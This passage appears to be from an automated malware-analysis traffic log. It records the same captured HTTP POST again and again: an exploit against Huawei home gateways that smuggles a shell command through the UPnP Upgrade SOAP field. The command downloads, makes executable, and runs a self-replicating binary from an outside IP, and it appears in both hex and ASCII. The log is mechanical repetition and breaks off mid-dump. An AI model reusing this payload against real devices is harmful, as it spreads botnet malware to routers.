67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 